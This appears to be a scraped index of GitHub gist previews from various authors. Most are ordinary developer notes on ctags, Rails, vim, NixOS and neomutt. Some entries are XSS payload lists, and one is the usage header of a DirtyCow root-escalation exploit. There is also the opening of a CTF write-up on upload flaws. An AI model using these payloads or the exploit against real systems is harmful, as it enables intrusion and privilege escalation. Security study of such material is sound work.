nazgob

# you have ctags but it does not work...
$ ctags -R --exclude=.git --exclude=log *
ctags: illegal option -- R
usage: ctags [-BFadtuwvx] [-f tagsfile] file ...

#you need to get new ctags, i recommend homebrew but anything will work
$ brew install ctags

#alias ctags if you used homebrew
$ alias ctags="`brew --prefix`/bin/ctags"

JohannesHoppe

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>        
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

iangreenleaf

Rails naming conventions

General Ruby conventions

Class names are CamelCase.

Methods and variables are snake_case.

Methods with a ? suffix will return a boolean.

v0d1ch

1,$s/\n/,/g  #replace comma with new line
%norm A*     #append * to every line
bufdo! %s/FIND/REPLACE/g    # search all buffers

martijnvermaat

Installation of NixOS with encrypted root

These are my notes on instaling NixOS 16.03 on a Lenovo ThinkPad X1 Carbon (4th generation) with an encrypted root file system using UEFI.

Most of this is scrambled from the following pages:

• Encrypted Root on NixOS - Nix Wiki
• Installing NixOS - Chris Martin
• Linux administration and use - Earl Douglas
• Installing NixOS on a ThinkPad W540 with encrypted root - Bluish Coder

rverton

/*
* (un)comment correct payload first (x86 or x64)!
* 
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten

kurobeats

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">

HelioCampos

Database migration best practices for Rails

Never ever change data on schema changes! [1]

Use rake tasks to change the data! [1]

This decouples a deployment from completed migrations. Give us control of the data manipulation proccess by encapsulatin it in on place. need to remember to:

1. Run it in one of the ways bellow: a. Add this rake task the deployment script or;

VladimirPal

set imap_user="mail.vpal@gmail.com"
set imap_pass=`/usr/bin/security find-generic-password -w -a 'mail.vpal@gmail.com' -s 'Gmail'`

set folder=imaps://imap.gmail.com/
set spoolfile=+INBOX
set record="+[Gmail]/Sent Mail"
set postponed="+[Gmail]/Drafts"

# https://www.neomutt.org/guide/reference search sleep_time for additional info
set sleep_time=0 # be faster

berzerk0

This gist has been DEPRECATED.

The official version is found at https://berzerk0.github.io/GitPage/CTF-Writeups/ZorZ-Vulnhub.html

Updates will be reflected on GITPAGE VERSIONS ONLY

A Few WebApp File Upload Vulnerabilities Explained - CTF Writeup: Zorz

20 November 2017

This is "CTF" is more of a vulnerability sandbox than a true Capture the Flag challenge. However, it is a great way to explore some WebApp Upload vulnerabilities.

The VulnHub description says: